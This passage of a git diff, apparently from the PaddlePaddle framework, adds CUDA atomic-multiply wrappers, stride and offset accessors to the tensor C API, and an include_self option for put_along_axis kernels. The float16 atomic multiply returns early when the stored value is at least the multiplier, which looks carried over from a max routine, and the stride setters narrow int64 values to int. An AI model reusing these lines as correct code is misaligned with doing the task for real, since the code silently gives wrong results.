+  args : (Tensor arr, Tensor indices, Tensor values, Tensor out, Tensor out_grad, int axis, str reduce, bool include_self)
   output : Tensor(arr_grad), Tensor(values_grad)
   infer_meta :
     func : GeneralBinaryGradInferMeta
diff --git a/paddle/phi/api/yaml/generator/dist_bw_api_gen.py b/paddle/phi/api/yaml/generator/dist_bw_api_gen.py
index 3769155eb27e11..c7ec9ace290ac7 100644
--- a/paddle/phi/api/yaml/generator/dist_bw_api_gen.py
+++ b/paddle/phi/api/yaml/generator/dist_bw_api_gen.py
@@ -425,6 +425,7 @@ def source_include(header_file_path, fw_header_file_path):
 #include "{fw_header_file_path}"
 #include "paddle/phi/infermeta/backward.h"
 #include "paddle/phi/infermeta/unary.h"
+#include "paddle/phi/infermeta/fusion.h"
 
 #include "paddle/phi/api/profiler/event_tracing.h"
 #include "paddle/phi/api/profiler/supplement_tracing.h"
diff --git a/paddle/phi/api/yaml/legacy_backward.yaml b/paddle/phi/api/yaml/legacy_backward.yaml
index 04cf57a88bb7cb..3f11781dfe88eb 100755
--- a/paddle/phi/api/yaml/legacy_backward.yaml
+++ b/paddle/phi/api/yaml/legacy_backward.yaml
@@ -614,14 +614,14 @@
 
 - backward_op : set_value_grad
   forward : set_value (Tensor x, IntArray starts, IntArray ends, IntArray steps, int64_t[] axes, int64_t[] decrease_axes, int64_t[] none_axes, int64_t[] shape, Scalar[] values) -> Tensor(out)
-  args : (Tensor out_grad)
+  args : (Tensor out_grad, IntArray starts, IntArray ends, IntArray steps, int64_t[] axes, int64_t[] decrease_axes, int64_t[] none_axes)
   output : Tensor(x_grad)
   infer_meta:
     func: UnchangedInferMeta
     param: [out_grad]
   kernel:
-    func: assign
-    param: [out_grad]
+    func: set_value_with_scalar_grad
+    param: [out_grad, starts, ends, steps, axes, decrease_axes, none_axes]
 
 - backward_op : set_value_with_tensor_grad
   forward: set_value_with_tensor (Tensor x, Tensor values, IntArray starts, IntArray ends, IntArray steps, int64_t[] axes, int64_t[] decrease_axes, int64_t[] none_axes) -> Tensor(out)
diff --git a/paddle/phi/api/yaml/op_compat.yaml b/paddle/phi/api/yaml/op_compat.yaml
index e4bbb15073f418..dfcdf65673e208 100755
--- a/paddle/phi/api/yaml/op_compat.yaml
+++ b/paddle/phi/api/yaml/op_compat.yaml
@@ -2432,7 +2432,7 @@
   outputs :
     out : Result
   attrs :
-    {axis : Axis, reduce : Reduce}
+    {axis : Axis, reduce : Reduce, include_self: Include_self}
 
 - op : pylayer
   backward : pylayer_grad
diff --git a/paddle/phi/api/yaml/ops.yaml b/paddle/phi/api/yaml/ops.yaml
index 092b3d71a60b4d..efc1b17714a854 100644
--- a/paddle/phi/api/yaml/ops.yaml
+++ b/paddle/phi/api/yaml/ops.yaml
@@ -2032,7 +2032,7 @@
   backward : psroi_pool_grad
 
 - op : put_along_axis
-  args : (Tensor arr, Tensor indices, Tensor values, int axis, str reduce = "assign")
+  args : (Tensor arr, Tensor indices, Tensor values, int axis, str reduce = "assign", bool include_self = true)
   output : Tensor(out)
   infer_meta :
     func : UnchangedInferMeta
diff --git a/paddle/phi/backends/custom/custom_device.cc b/paddle/phi/backends/custom/custom_device.cc
index 48bedd1bd939e4..ddbfc60f19f083 100644
--- a/paddle/phi/backends/custom/custom_device.cc
+++ b/paddle/phi/backends/custom/custom_device.cc
@@ -383,7 +383,7 @@ class CustomDevice : public DeviceInterface {
     void* ptr = nullptr;
     const auto device = &devices_pool[dev_id];
 
-    if (!pimpl_->unified_memory_allocate) {
+    if (!pimpl_->host_memory_allocate) {
       PADDLE_THROW(phi::errors::Unavailable(
           "MemoryAllocateHost is not supported on %s.", Type()));
     } else {
diff --git a/paddle/phi/backends/gpu/gpu_primitives.h b/paddle/phi/backends/gpu/gpu_primitives.h
index 98ebea87eedfd8..03c33a221c4d3e 100644
--- a/paddle/phi/backends/gpu/gpu_primitives.h
+++ b/paddle/phi/backends/gpu/gpu_primitives.h
@@ -399,6 +399,182 @@ CUDA_ATOMIC_WRAPPER(Add, complex<double>) {
                          CudaAtomicAdd(imag, val.imag));
 }
 
+// For atomicMul.
+CUDA_ATOMIC_WRAPPER(Mul, int) {
+  int res = *address, old = res;  // NOLINT
+  do {
+    old = res;
+    res = atomicCAS(address,     // NOLINT
+                    old,         // NOLINT
+                    val * old);  // NOLINT
+  } while (old != res);
+  return res;
+}
+
+CUDA_ATOMIC_WRAPPER(Mul, unsigned int) {
+  unsigned int res = *address, old = res;  // NOLINT
+  do {
+    old = res;
+    res = atomicCAS(address,     // NOLINT
+                    old,         // NOLINT
+                    val * old);  // NOLINT
+  } while (old != res);
+  return res;
+}
+// CUDA API uses unsigned long long int, we cannot use uint64_t here.
+// It because unsigned long long int is not necessarily uint64_t
+CUDA_ATOMIC_WRAPPER(Mul, unsigned long long int) {  // NOLINT
+  unsigned long long int old = *address, assumed;   // NOLINT
+
+  do {
+    assumed = old;
+    old = atomicCAS(address, assumed, val * assumed);
+  } while (assumed != old);
+  return old;
+}
+
+CUDA_ATOMIC_WRAPPER(Mul, int64_t) {
+  // Here, we check long long int must be int64_t.
+  static_assert(sizeof(int64_t) == sizeof(long long int),  // NOLINT
+                "long long should be int64");
+  long long int res = *address, old = res;  // NOLINT
+  do {
+    old = res;
+    res = (long long int)atomicCAS(                                  // NOLINT
+        (unsigned long long int *)address,                           // NOLINT
+        (unsigned long long int)old,                                 // NOLINT
+        (unsigned long long int)val * (unsigned long long int)old);  // NOLINT
+  } while (old != res);
+  return res;
+}
+
+CUDA_ATOMIC_WRAPPER(Mul, float) {
+  int *const address_as_i = reinterpret_cast<int *>(address);
+  int old = *address_as_i, assumed;
+
+  do {
+    assumed = old;
+    old = atomicCAS(
+        address_as_i, assumed, __float_as_int(val * __int_as_float(assumed)));
+  } while (assumed != old);
+
+  return __int_as_float(old);
+}
+
+CUDA_ATOMIC_WRAPPER(Mul, double) {
+  unsigned long long int *const address_as_ull =            // NOLINT
+      reinterpret_cast<unsigned long long int *>(address);  // NOLINT
+  unsigned long long int old = *address_as_ull, assumed;    // NOLINT
+
+  do {
+    assumed = old;
+
+    old = atomicCAS(address_as_ull,
+                    assumed,
+                    __double_as_longlong(val * __longlong_as_double(assumed)));
+  } while (assumed != old);
+
+  return __longlong_as_double(old);
+}
+
+#ifdef PADDLE_CUDA_FP16
+inline static __device__ uint32_t mul_to_low_half(uint32_t val, float x) {
+  phi::dtype::float16 low_half;
+  // The float16 in lower 16bits
+  low_half.x = static_cast<uint16_t>(val & 0xFFFFu);
+  low_half = static_cast<phi::dtype::float16>(static_cast<float>(low_half) * x);
+  return (val & 0xFFFF0000u) | low_half.x;
+}
+
+inline static __device__ uint32_t mul_to_high_half(uint32_t val, float x) {
+  phi::dtype::float16 high_half;
+  // The float16 in higher 16bits
+  high_half.x = static_cast<uint16_t>(val >> 16);
+  high_half =
+      static_cast<phi::dtype::float16>(static_cast<float>(high_half) * x);
+  return (val & 0xFFFFu) | (static_cast<uint32_t>(high_half.x) << 16);
+}
+
+CUDA_ATOMIC_WRAPPER(Mul, phi::dtype::float16) {
+  if (*address >= val) {
+    return *address;
+  }
+  uint32_t *address_as_ui = reinterpret_cast<uint32_t *>(
+      reinterpret_cast<char *>(address) -
+      (reinterpret_cast<uintptr_t>(address) & 0x02));
+  float val_f = static_cast<float>(val);
+  uint32_t old = *address_as_ui;
+  uint32_t assumed;
+  if (((uintptr_t)address & 0x02) == 0) {
+    // The float16 value stay at lower 16 bits of the address.
+    do {
+      assumed = old;
+      old = atomicCAS(address_as_ui, assumed, mul_to_low_half(assumed, val_f));
+    } while (old != assumed);
+    phi::dtype::float16 ret;
+    ret.x = old & 0xFFFFu;
+    return ret;
+  } else {
+    // The float16 value stay at higher 16 bits of the address.
+    do {
+      assumed = old;
+      old = atomicCAS(address_as_ui, assumed, mul_to_high_half(assumed, val_f));
+    } while (old != assumed);
+    phi::dtype::float16 ret;
+    ret.x = old >> 16;
+    return ret;
+  }
+}
+#endif
+
+inline static __device__ uint32_t bf16_mul_to_low_half(uint32_t val, float x) {
+  phi::dtype::bfloat16 low_half;
+  // The bfloat16 in lower 16bits
+  low_half.x = static_cast<uint16_t>(val & 0xFFFFu);
+  low_half =
+      static_cast<phi::dtype::bfloat16>(static_cast<float>(low_half) * x);
+  return (val & 0xFFFF0000u) | low_half.x;
+}
+
+inline static __device__ uint32_t bf16_mul_to_high_half(uint32_t val, float x) {
+  phi::dtype::bfloat16 high_half;
+  // The bfloat16 in higher 16bits
+  high_half.x = static_cast<uint16_t>(val >> 16);
+  high_half =
+      static_cast<phi::dtype::bfloat16>(static_cast<float>(high_half) * x);
+  return (val & 0xFFFFu) | (static_cast<uint32_t>(high_half.x) << 16);
+}
+
+CUDA_ATOMIC_WRAPPER(Mul, phi::dtype::bfloat16) {
+  uint32_t *address_as_ui = reinterpret_cast<uint32_t *>(
+      reinterpret_cast<char *>(address) -
+      (reinterpret_cast<uintptr_t>(address) & 0x02));
+  float val_f = static_cast<float>(val);
+  uint32_t old = *address_as_ui;
+  uint32_t assumed;
+  if (((uintptr_t)address & 0x02) == 0) {
+    // The bfloat16 value stay at lower 16 bits of the address.
+    do {
+      assumed = old;
+      old = atomicCAS(
+          address_as_ui, assumed, bf16_mul_to_low_half(assumed, val_f));
+    } while (old != assumed);
+    phi::dtype::bfloat16 ret;
+    ret.x = old & 0xFFFFu;
+    return ret;
+  } else {
+    // The bfloat16 value stay at higher 16 bits of the address.
+    do {
+      assumed = old;
+      old = atomicCAS(
+          address_as_ui, assumed, bf16_mul_to_high_half(assumed, val_f));
+    } while (old != assumed);
+    phi::dtype::bfloat16 ret;
+    ret.x = old >> 16;
+    return ret;
+  }
+}
+
 // For atomicMax
 USE_CUDA_ATOMIC(Max, int);
 USE_CUDA_ATOMIC(Max, unsigned int);
diff --git a/paddle/phi/capi/include/c_meta_tensor.h b/paddle/phi/capi/include/c_meta_tensor.h
index 08f01084c6abf3..f4c9a541e526aa 100644
--- a/paddle/phi/capi/include/c_meta_tensor.h
+++ b/paddle/phi/capi/include/c_meta_tensor.h
@@ -39,6 +39,13 @@ int64_t PD_MetaTensorGetDim(const PD_MetaTensor *tensor,
                             size_t index,
                             PD_Status *status);
 
+int64_t PD_MetaTensorGetNumStrides(const PD_MetaTensor *tensor,
+                                   PD_Status *status);
+
+int64_t PD_MetaTensorGetStride(const PD_MetaTensor *tensor,
+                               size_t index,
+                               PD_Status *status);
+
 bool PD_MetaTensorIsValid(const PD_MetaTensor *tensor, PD_Status *status);
 
 void PD_MetaTensorSetDims(PD_MetaTensor *tensor,
@@ -46,6 +53,11 @@ void PD_MetaTensorSetDims(PD_MetaTensor *tensor,
                           const int64_t *dims,
                           PD_Status *status);
 
+void PD_MetaTensorSetStrides(PD_MetaTensor *tensor,
+                             int64_t nstrides,
+                             const int64_t *strides,
+                             PD_Status *status);
+
 void PD_MetaTensorSetDataType(PD_MetaTensor *tensor,
                               PD_DataType dtype,
                               PD_Status *status);
diff --git a/paddle/phi/capi/include/c_tensor.h b/paddle/phi/capi/include/c_tensor.h
index c4f706c70ccfb4..2df292c6b946b2 100644
--- a/paddle/phi/capi/include/c_tensor.h
+++ b/paddle/phi/capi/include/c_tensor.h
@@ -41,6 +41,12 @@ int64_t PD_TensorGetDim(const PD_Tensor *tensor,
                         size_t index,
                         PD_Status *status);
 
+int64_t PD_TensorGetNumStrides(const PD_Tensor *tensor, PD_Status *status);
+
+int64_t PD_TensorGetStride(const PD_Tensor *tensor,
+                           size_t index,
+                           PD_Status *status);
+
 void PD_TensorGetLoD(const PD_Tensor *tensor,
                      PD_List *data,
                      PD_List *offset,
@@ -52,11 +58,22 @@ bool PD_TensorIsValid(const PD_Tensor *tensor, PD_Status *status);
 
 void *PD_TensorGetHolder(const PD_Tensor *tensor, PD_Status *status);
 
+size_t PD_TensorGetOffset(const PD_Tensor *tensor, PD_Status *status);
+
 void PD_TensorSetDims(PD_Tensor *tensor,
                       int64_t ndims,
                       const int64_t *dims,
                       PD_Status *status);
 
+void PD_TensorSetOffset(PD_Tensor *tensor,
+                        const int64_t offset,
+                        PD_Status *status);
+
+void PD_TensorSetStrides(PD_Tensor *tensor,
+                         int64_t nstrides,
+                         const int64_t *strides,
+                         PD_Status *status);
+
 void PD_TensorSetDataType(PD_Tensor *tensor,
                           PD_DataType dtype,
                           PD_Status *status);
diff --git a/paddle/phi/capi/include/wrapper_base.h b/paddle/phi/capi/include/wrapper_base.h
index 061561008a95e7..75f3e2d9e350eb 100644
--- a/paddle/phi/capi/include/wrapper_base.h
+++ b/paddle/phi/capi/include/wrapper_base.h
@@ -72,6 +72,19 @@ inline std::vector<int64_t> PD_TensorGetDims(PD_Tensor* tensor,
   return std::vector<int64_t>();
 }
 
+inline std::vector<int64_t> PD_TensorGetStrides(PD_Tensor* tensor,
+                                                PD_Status* status) {
+  int64_t nstrides = PD_TensorGetNumStrides(tensor, status);
+  if (nstrides > 0) {
+    std::vector<int64_t> shape(nstrides);
+    for (int64_t i = 0; i < nstrides; ++i) {
+      shape[i] = PD_TensorGetStride(tensor, i, status);
+    }
+    return shape;
+  }
+  return std::vector<int64_t>();
+}
+
 inline std::vector<int64_t> PD_MetaTensorGetDims(PD_MetaTensor* tensor,
                                                  PD_Status* status) {
   int64_t ndims = PD_MetaTensorGetNumDims(tensor, status);
@@ -85,6 +98,19 @@ inline std::vector<int64_t> PD_MetaTensorGetDims(PD_MetaTensor* tensor,
   return std::vector<int64_t>();
 }
 
+inline std::vector<int64_t> PD_MetaTensorGetStrides(PD_MetaTensor* tensor,
+                                                    PD_Status* status) {
+  int64_t nstrides = PD_MetaTensorGetNumStrides(tensor, status);
+  if (nstrides > 0) {
+    std::vector<int64_t> shape(nstrides);
+    for (int64_t i = 0; i < nstrides; ++i) {
+      shape[i] = PD_MetaTensorGetStride(tensor, i, status);
+    }
+    return shape;
+  }
+  return std::vector<int64_t>();
+}
+
 template <typename T>
 class WrapperBase {
  public:
@@ -134,6 +160,13 @@ class DenseTensor : public WrapperBase<PD_Tensor> {
     return holder;
   }
 
+  size_t offset() const {
+    C_Status status;
+    auto offset = PD_TensorGetOffset(raw_data(), &status);
+    PD_CHECK_STATUS(status);
+    return offset;
+  }
+
   std::vector<int64_t> dims() const {
     C_Status status;
     auto dimension = PD_TensorGetDims(raw_data(), &status);
@@ -141,6 +174,13 @@ class DenseTensor : public WrapperBase<PD_Tensor> {
     return dimension;
   }
 
+  std::vector<int64_t> strides() const {
+    C_Status status;
+    auto strides = PD_TensorGetStrides(raw_data(), &status);
+    PD_CHECK_STATUS(status);
+    return strides;
+  }
+
   PD_DataType dtype() const {
     C_Status status;
     auto data_type = PD_TensorGetPDDataType(raw_data(), &status);
@@ -207,6 +247,18 @@ class DenseTensor : public WrapperBase<PD_Tensor> {
     PD_CHECK_STATUS(status);
   }
 
+  void set_offset(const int64_t& offset) {
+    C_Status status;
+    PD_TensorSetOffset(raw_data(), offset, &status);
+    PD_CHECK_STATUS(status);
+  }
+
+  void set_strides(const std::vector<int64_t>& strides) {
+    C_Status status;
+    PD_TensorSetStrides(raw_data(), strides.size(), strides.data(), &status);
+    PD_CHECK_STATUS(status);
+  }
+
   void set_dtype(PD_DataType data_type) {
     C_Status status;
     PD_TensorSetDataType(raw_data(), data_type, &status);
@@ -513,6 +565,13 @@ class MetaTensor : WrapperBase<PD_MetaTensor> {
     return dimension;
   }
 
+  std::vector<int64_t> strides() const {
+    C_Status status;
+    auto strides = PD_MetaTensorGetStrides(raw_data(), &status);
+    PD_CHECK_STATUS(status);
+    return strides;
+  }
+
   PD_DataType dtype() const {
     C_Status status;
     auto data_type = PD_MetaTensorGetPDDataType(raw_data(), &status);
@@ -540,6 +599,13 @@ class MetaTensor : WrapperBase<PD_MetaTensor> {
     PD_CHECK_STATUS(status);
   }
 
+  void set_strides(const std::vector<int64_t>& strides) {
+    C_Status status;
+    PD_MetaTensorSetStrides(
+        raw_data(), strides.size(), strides.data(), &status);
+    PD_CHECK_STATUS(status);
+  }
+
   void set_dtype(PD_DataType data_type) {
     C_Status status;
     PD_MetaTensorSetDataType(raw_data(), data_type, &status);
diff --git a/paddle/phi/capi/lib/c_meta_tensor.cc b/paddle/phi/capi/lib/c_meta_tensor.cc
index 6ea6eda1a7f23e..f436ba9d3cde0d 100644
--- a/paddle/phi/capi/lib/c_meta_tensor.cc
+++ b/paddle/phi/capi/lib/c_meta_tensor.cc
@@ -88,6 +88,36 @@ int64_t PD_MetaTensorGetDim(const PD_MetaTensor *tensor,
   return cc_tensor->dims()[index];
 }
 
+int64_t PD_MetaTensorGetNumStrides(const PD_MetaTensor *tensor,
+                                   PD_Status *status) {
+  if (status) {
+    if (!tensor) {
+      *status = C_FAILED;
+      return 0;
+    }
+    *status = C_SUCCESS;
+  }
+
+  auto cc_tensor = reinterpret_cast<const phi::MetaTensor *>(tensor);
+  return cc_tensor->strides().size();
+}
+
+int64_t PD_MetaTensorGetStride(const PD_MetaTensor *tensor,
+                               size_t index,
+                               PD_Status *status) {
+  auto cc_tensor = reinterpret_cast<const phi::MetaTensor *>(tensor);
+
+  if (status) {
+    if (!tensor || index >= static_cast<size_t>(cc_tensor->strides().size())) {
+      *status = C_FAILED;
+      return 0;
+    }
+    *status = C_SUCCESS;
+  }
+
+  return cc_tensor->strides()[index];
+}
+
 bool PD_MetaTensorIsValid(const PD_MetaTensor *tensor, PD_Status *status) {
   if (status) {
     if (!tensor) {
@@ -117,6 +147,22 @@ void PD_MetaTensorSetDims(PD_MetaTensor *tensor,
   cc_tensor->set_dims(common::make_ddim(shape));
 }
 
+void PD_MetaTensorSetStrides(PD_MetaTensor *tensor,
+                             int64_t nstrides,
+                             const int64_t *strides,
+                             PD_Status *status) {
+  if (status) {
+    if (!tensor) {
+      *status = C_FAILED;
+      return;
+    }
+    *status = C_SUCCESS;
+  }
+  auto cc_tensor = reinterpret_cast<phi::MetaTensor *>(tensor);
+  std::vector<int> shape(strides, strides + nstrides);
+  cc_tensor->set_strides(common::make_ddim(shape));
+}
+
 void PD_MetaTensorSetDataType(PD_MetaTensor *tensor,
                               PD_DataType dtype,
                               PD_Status *status) {
diff --git a/paddle/phi/capi/lib/c_tensor.cc b/paddle/phi/capi/lib/c_tensor.cc
index 31a724447b7c7f..eb8c8c6f4eb47d 100644
--- a/paddle/phi/capi/lib/c_tensor.cc
+++ b/paddle/phi/capi/lib/c_tensor.cc
@@ -111,6 +111,35 @@ int64_t PD_TensorGetDim(const PD_Tensor* tensor,
   return cc_tensor->dims()[index];
 }
 
+int64_t PD_TensorGetNumStrides(const PD_Tensor* tensor, PD_Status* status) {
+  if (status) {
+    if (!tensor) {
+      *status = C_FAILED;
+      return 0;
+    }
+    *status = C_SUCCESS;
+  }
+
+  auto cc_tensor = reinterpret_cast<const phi::DenseTensor*>(tensor);
+  return cc_tensor->strides().size();
+}
+
+int64_t PD_TensorGetStride(const PD_Tensor* tensor,
+                           size_t index,
+                           PD_Status* status) {
+  auto cc_tensor = reinterpret_cast<const phi::DenseTensor*>(tensor);
+
+  if (status) {
+    if (!tensor || index >= static_cast<size_t>(cc_tensor->strides().size())) {
+      *status = C_FAILED;
+      return 0;
+    }
+    *status = C_SUCCESS;
+  }
+
+  return cc_tensor->strides()[index];
+}
+
 void PD_TensorGetLoD(const PD_Tensor* tensor,
                      PD_List* data,
                      PD_List* offset,
@@ -185,6 +214,19 @@ void* PD_TensorGetHolder(const PD_Tensor* tensor, PD_Status* status) {
   return cc_tensor->Holder().get();
 }
 
+size_t PD_TensorGetOffset(const PD_Tensor* tensor, PD_Status* status) {
+  if (status) {
+    if (!tensor) {
+      *status = C_FAILED;
+      return 0;
+    }
+    *status = C_SUCCESS;
+  }
+
+  auto cc_tensor = reinterpret_cast<const phi::DenseTensor*>(tensor);
+  return cc_tensor->offset();
+}
+
 void PD_TensorSetDims(PD_Tensor* tensor,
                       int64_t ndims,
                       const int64_t* dims,
@@ -201,6 +243,36 @@ void PD_TensorSetDims(PD_Tensor* tensor,
   cc_tensor->Resize(common::make_ddim(shape));
 }
 
+void PD_TensorSetOffset(PD_Tensor* tensor,
+                        const int64_t offset,
+                        PD_Status* status) {
+  if (status) {
+    if (!tensor) {
+      *status = C_FAILED;
+      return;
+    }
+    *status = C_SUCCESS;
+  }
+  auto cc_tensor = reinterpret_cast<phi::DenseTensor*>(tensor);
+  cc_tensor->set_offset(offset);
+}
+
+void PD_TensorSetStrides(PD_Tensor* tensor,
+                         int64_t nstrides,
+                         const int64_t* strides,
+                         PD_Status* status) {
+  if (status) {
+    if (!tensor) {
+      *status = C_FAILED;
+      return;
+    }
+    *status = C_SUCCESS;
+  }
+  auto cc_tensor = reinterpret_cast<phi::DenseTensor*>(tensor);
+  std::vector<int> shape(strides, strides + nstrides);
+  cc_tensor->set_strides(common::make_ddim(shape));
+}
+
 void PD_TensorSetDataType(PD_Tensor* tensor,
                           PD_DataType dtype,
                           PD_Status* status) {
diff --git a/paddle/phi/core/generator.cc b/paddle/phi/core/generator.cc
index a2fe426b0ec47b..978552e13c0e8a 100644
--- a/paddle/phi/core/generator.cc
+++ b/paddle/phi/core/generator.cc
@@ -278,7 +278,7 @@ uint64_t Generator::Random64() {
 
 std::pair<uint64_t, uint64_t> Generator::IncrementOffset(
     uint64_t increment_offset) {
-#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP) || defined(PADDLE_WITH_MUSA)
+#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP) || defined(PADDLE_WITH_MUSA) || defined(PADDLE_WITH_CUSTOM_DEVICE)
   std::lock_guard<std::mutex> lock(this->mu_);
   uint64_t cur_offset = this->state_.thread_offset;
   VLOG(10) << "cur_offset = " << cur_offset
diff --git a/paddle/phi/core/visit_type.h b/paddle/phi/core/visit_type.h
index 6c61c3964b52d6..296db9b1781987 100644
--- a/paddle/phi/core/visit_type.h
+++ b/paddle/phi/core/visit_type.h
@@ -355,7 +355,7 @@ namespace phi {
                  "`");                                                        \
     }                                                                         \
   }()
-#if defined(PADDLE_WITH_XPU)
+#if defined(PADDLE_WITH_XPU) || defined(PADDLE_WITH_HIP)
 #define PD_VISIT_ALL_TYPES(TYPE, NAME, ...)                                    \
   [&] {                                                                        \
     const auto& __dtype__ = TYPE;                                              \
diff --git a/paddle/phi/kernels/CMakeLists.txt b/paddle/phi/kernels/CMakeLists.txt
index 2df3f34b57936c..6432dc19f768e9 100644
--- a/paddle/phi/kernels/CMakeLists.txt
+++ b/paddle/phi/kernels/CMakeLists.txt
@@ -77,6 +77,8 @@ if(WITH_MUSA)
     "selected_rows/gpu/clip_by_norm_kernel.cu"
     "gpu/softmax_grad_kernel.cu"
     "gpu/softmax_kernel.cu"
+    "gpu/put_along_axis_grad_kernel.cu"
+    "gpu/put_along_axis_kernel.cu"
     )
 endif()
 
@@ -217,6 +219,32 @@ if(NOT WITH_CUDNN_FRONTEND)
     "fusion/gpu/fused_dconv_drelu_dbn_kernel.cu")
 endif()
 
+# Note(qili93): remove kernels not supported on DCU yet
+if(WITH_ROCM)
+  list(
+    REMOVE_ITEM
+    kernel_cu
+    "gpu/affine_grid_grad_kernel.cu"
+    "gpu/apply_per_channel_scale_kernel.cu"
+    "gpu/cholesky_solve_kernel.cu"
+    "gpu/eigh_kernel.cu"
+    "gpu/eigvalsh_kernel.cu"
+    "gpu/lstsq_kernel.cu"
+    "gpu/lu_kernel.cu"
+    "gpu/matrix_rank_kernel.cu"
+    "gpu/matrix_rank_tol_kernel.cu"
+    "gpu/multiclass_nms3_kernel.cu"
+    "gpu/put_along_axis_grad_kernel.cu"
+    "gpu/put_along_axis_kernel.cu"
+    "gpu/qr_kernel.cu"
+    "gpu/svd_kernel.cu"
+    "gpudnn/mha_cudnn_frontend.cu"
+    "fusion/gpu/block_multi_head_attention_kernel.cu"
+    "fusion/gpu/fused_bn_add_activation_grad_kernel.cu"
+    "fusion/gpu/fused_bn_add_activation_kernel.cu"
+    "fusion/gpu/fusion_transpose_flatten_concat_kernel.cu")
+endif()
+
 set(cc_search_pattern
     "*.cc"
     "cpu/*.cc"
@@ -243,6 +271,10 @@ if(WITH_MKLDNN)
                         "fusion/onednn/*.cc")
 endif()
 
+if(WITH_CUSTOM_DEVICE)
+  set(cc_search_pattern ${cc_search_pattern} "custom/*.cc")
+endif()
+
 file(
   GLOB kernel_cc
   RELATIVE "${CMAKE_CURRENT_SOURCE_DIR}"
diff --git a/paddle/phi/kernels/cpu/cum_maxmin_grad_kernel.cc b/paddle/phi/kernels/cpu/cum_maxmin_grad_kernel.cc
index acd84a80be2ad1..47e804b7de2775 100644
--- a/paddle/phi/kernels/cpu/cum_maxmin_grad_kernel.cc
+++ b/paddle/phi/kernels/cpu/cum_maxmin_grad_kernel.cc
@@ -38,10 +38,10 @@ void CummaxGradKernel(const Context& dev_ctx,
   }
   if (dtype == DataType::INT32) {
     phi::funcs::cpu_scatter_add_kernel<T, int32_t>(
-        *x_grad, axis, indices, out_grad, dev_ctx);
+        *x_grad, axis, indices, out_grad, true, dev_ctx);
   } else if (dtype == DataType::INT64) {
     phi::funcs::cpu_scatter_add_kernel<T, int64_t>(
-        *x_grad, axis, indices, out_grad, dev_ctx);
+        *x_grad, axis, indices, out_grad, true, dev_ctx);
   }
 }
 
@@ -61,10 +61,10 @@ void CumminGradKernel(const Context& dev_ctx,
   }
   if (dtype == DataType::INT32) {
     phi::funcs::cpu_scatter_add_kernel<T, int32_t>(
-        *x_grad, axis, indices, out_grad, dev_ctx);
+        *x_grad, axis, indices, out_grad, true, dev_ctx);
   } else if (dtype == DataType::INT64) {
     phi::funcs::cpu_scatter_add_kernel<T, int64_t>(
-        *x_grad, axis, indices, out_grad, dev_ctx);
+        *x_grad, axis, indices, out_grad, true, dev_ctx);
   }
 }
 
diff --git a/paddle/phi/kernels/cpu/put_along_axis_grad_kernel.cc b/paddle/phi/kernels/cpu/put_along_axis_grad_kernel.cc
index dd7b762849d16b..aeb2071b136de8 100644
--- a/paddle/phi/kernels/cpu/put_along_axis_grad_kernel.cc
+++ b/paddle/phi/kernels/cpu/put_along_axis_grad_kernel.cc
@@ -25,11 +25,14 @@ namespace phi {
 
 template <typename T, typename Context>
 void PutAlongAxisGradKernel(const Context& dev_ctx,
-                            const DenseTensor& x UNUSED,
+                            const DenseTensor& x,
                             const DenseTensor& index,
+                            const DenseTensor& value,
+                            const DenseTensor& out,
                             const DenseTensor& out_grad,
                             int axis,
-                            const std::string& reduce UNUSED,
+                            const std::string& reduce,
+                            bool include_self,
                             DenseTensor* x_grad,
                             DenseTensor* value_grad) {
   PADDLE_ENFORCE_EQ(
@@ -40,31 +43,135 @@ void PutAlongAxisGradKernel(const Context& dev_ctx,
   const auto& index_type = index.dtype();
   if (x_grad) {
     phi::Copy(dev_ctx, out_grad, dev_ctx.GetPlace(), false, x_grad);
-    if (index_type == DataType::INT32) {
-      phi::funcs::cpu_scatter_input_grad_kernel<T, int32_t>(
-          // Here passing an unused argument out_grad, because it's
-          // convenient to instantiate a bunch of template function with the
-          // same arguments list.
-          out_grad,
-          axis,
-          index,
-          *x_grad,
-          dev_ctx);
-    } else {
-      phi::funcs::cpu_scatter_input_grad_kernel<T, int64_t>(
-          out_grad, axis, index, *x_grad, dev_ctx);
+    if (include_self == false || reduce == "assign") {
+      if (index_type == DataType::INT32) {
+        phi::funcs::cpu_scatter_input_grad_kernel<T, int32_t>(
+            // Here passing an unused argument out_grad, because it's
+            // convenient to instantiate a bunch of template function with the
+            // same arguments list.
+            out_grad,
+            axis,
+            index,
+            *x_grad,
+            include_self,
+            dev_ctx);
+      } else {
+        phi::funcs::cpu_scatter_input_grad_kernel<T, int64_t>(
+            out_grad, axis, index, *x_grad, include_self, dev_ctx);
+      }
+    } else if (reduce == "multiply" || reduce == "mul" || reduce == "amin" ||
+               reduce == "amax") {
+      if (index_type == DataType::INT32) {
+        phi::funcs::cpu_scatter_mul_min_max_input_grad_kernel<T, int32_t>(
+            out_grad,
+            axis,
+            index,
+            out,
+            x,
+            value,
+            *x_grad,
+            reduce,
+            include_self,
+            dev_ctx);
+      } else {
+        phi::funcs::cpu_scatter_mul_min_max_input_grad_kernel<T, int64_t>(
+            out_grad,
+            axis,
+            index,
+            out,
+            x,
+            value,
+            *x_grad,
+            reduce,
+            include_self,
+            dev_ctx);
+      }
+    } else if (reduce == "mean") {
+      if (index_type == DataType::INT32) {
+        phi::funcs::cpu_scatter_mean_input_grad_kernel<T, int32_t>(
+            // Here passing an unused argument out_grad, because it's
+            // convenient to instantiate a bunch of template function with the
+            // same arguments list.
+            out_grad,
+            axis,
+            index,
+            *x_grad,
+            include_self,
+            dev_ctx);
+      } else {
+        phi::funcs::cpu_scatter_mean_input_grad_kernel<T, int64_t>(
+            out_grad, axis, index, *x_grad, include_self, dev_ctx);
+      }
     }
   }
 
   if (value_grad) {
     value_grad->Resize(index.dims());
     dev_ctx.template Alloc<T>(value_grad);
-    if (index_type == DataType::INT32) {
-      phi::funcs::cpu_scatter_value_grad_kernel<T, int32_t>(
-          out_grad, axis, index, *value_grad, dev_ctx);
-    } else {
-      phi::funcs::cpu_scatter_value_grad_kernel<T, int64_t>(
-          out_grad, axis, index, *value_grad, dev_ctx);
+    auto* grad_data = value_grad->data<T>();
+    int64_t grad_size = value_grad->numel();
+    memset(grad_data, 0, sizeof(T) * grad_size);
+    if (reduce == "assign") {
+      if (index_type == DataType::INT32) {
+        phi::funcs::cpu_scatter_value_grad_kernel<T, int32_t>(
+            out_grad, axis, index, *value_grad, include_self, dev_ctx);
+      } else if (index_type == DataType::INT64) {
+        phi::funcs::cpu_scatter_value_grad_kernel<T, int64_t>(
+            out_grad, axis, index, *value_grad, include_self, dev_ctx);
+      }
